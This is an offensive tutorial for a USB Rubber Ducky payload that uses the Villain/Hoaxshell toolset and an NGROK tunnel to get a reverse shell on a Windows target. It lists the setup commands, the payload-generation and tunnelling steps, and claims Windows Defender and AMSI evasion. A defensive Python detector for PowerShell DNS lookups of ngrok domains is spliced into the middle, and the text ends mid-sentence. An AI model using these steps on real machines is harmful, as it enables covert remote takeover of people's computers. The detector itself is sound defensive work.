Title: Hoaxshell via Villain Payload and NGROK Tunnel
Author: HackingMark
OS: Windows
Version: 1.0
Requirements: DuckyScript 3.0, PowerShell, Linux machine with Villain, NGROK
What is Villain?
Villain is a toolset for setting up payloads and listeners for Hoaxshell. Hoaxshell is actually undetected by Windows Defender, and the payload is optimized to bypass AMSITrigger. The PowerShell payload connects the target machine back to the Hoaxshell server; NGROK makes this server reachable from the Internet. That way you can catch your session from everywhere. Once your session is established, you can open an interactive shell.
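Seen from the monitoring side, the connection described above is a PowerShell process resolving an NGROK tunnel hostname. The following detection sketch is an added example, not part of the original payload or of Villain. It assumes Sysmon DNS query events (Event ID 22) exported as JSON lines with the fields Image, QueryName and UtcTime; the suffix list is an assumption to adapt, and the sample events are constructed.

```python
import json
import ntpath

# Assumption: public ngrok tunnel domain suffixes; extend for your environment.
NGROK_SUFFIXES = ("ngrok.io", "ngrok.app", "ngrok-free.app", "ngrok.dev", "ngrok-free.dev")
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Constructed sample events (not real telemetry), one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 22, "UtcTime": "2024-01-01 10:00:01", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "QueryName": "example-tunnel.ngrok-free.app"}
{"EventID": 22, "UtcTime": "2024-01-01 10:00:05", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "QueryName": "example-tunnel.ngrok-free.app"}
{"EventID": 22, "UtcTime": "2024-01-01 10:00:09", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "QueryName": "www.notngrok.io"}
{"EventID": 22, "UtcTime": "2024-01-01 10:00:12", "Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "QueryName": "ABC123.NGROK.IO."}
{"EventID": 3, "UtcTime": "2024-01-01 10:00:15", "Image": "C:\\Windows\\System32\\svchost.exe", "DestinationPort": 443}
"""

def normalize_host(name):
    """Lower-case the name and drop surrounding whitespace and a trailing root dot."""
    return name.strip().rstrip(".").lower()

def is_ngrok_host(name):
    """Match on a label boundary so 'notngrok.io' is not treated as 'ngrok.io'."""
    host = normalize_host(name)
    return any(host == s or host.endswith("." + s) for s in NGROK_SUFFIXES)

def find_suspicious(lines):
    """Return (time, process, host) for PowerShell DNS queries to ngrok tunnels."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed export lines instead of aborting the scan
        if event.get("EventID") != 22:
            continue  # only DNS query events are considered here
        image = ntpath.basename(event.get("Image", "")).lower()
        host = event.get("QueryName", "")
        if image in POWERSHELL_IMAGES and is_ngrok_host(host):
            hits.append((event.get("UtcTime"), image, normalize_host(host)))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS.splitlines()):
        print(hit)
```

A browser resolving the same tunnel name is deliberately not flagged; the signal is the combination of a PowerShell host process and a tunnel domain.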
How to use this Payload
First, clone Villain from its repo:
git clone https://github.com/t3l3machus/Villain
Then install the requirements:
cd Villain
pip install -r ./requirements.txt
Make Villain executable:
chmod +x ./Villain.py
Fire it up:
./Villain.py
Generate a payload to get the session identifier:
generate os=windows lhost=0.0.0.0 lport=8080
Establish an NGROK tunnel forwarding traffic to our Hoaxshell engine:
ngrok http 8080
Leave this window open.
Preparing the payload: You need 2 values from above: the NGROK HTTPS link and the session identifier from Villain. Put them into the payload, then compile it to inject.bin and download it.
Copy your inject.bin to your Ducky!
Plug your Ducky into a Windows target.
Achieve reverse shell.
open a shell with